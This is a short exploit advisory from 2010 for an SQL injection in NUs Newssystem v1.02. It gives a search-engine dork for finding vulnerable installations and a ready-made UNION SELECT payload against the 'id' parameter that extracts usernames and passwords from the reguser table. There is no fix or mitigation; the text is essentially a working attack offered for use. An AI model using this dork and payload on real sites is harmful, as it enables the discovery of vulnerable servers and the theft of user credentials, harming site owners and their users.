NUs Newssystem v1.02 (id) SQL Injection Vulnerability
Posted on 09 March 2010
===================================================== NUs Newssystem v1.02 (id) SQL Injection Vulnerability ===================================================== .-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-. [+] Autor: n3w7u [+] Page: http://www.internet-works.de/home.html [+] Vulnerabilities [ SQL Injection ] [+] Language: [ PHP ] [+] Version: 1.02 [+] Dork : inurl:"?pageNum_RSnews"&view .-=--=--=--=--=--=--=--=--=--=--=-. [+] Vulnerability Nus.php?pageNum_RSnews=0&id= [+] Exploitable http://[host]/[path]/[script].php?pageNum_RSnews=0&id=9999999+union+select+1,2,3,user,5,pass,7,8,9+from+reguser-- # ~ - [ [ : Inj3ct0r : ] ]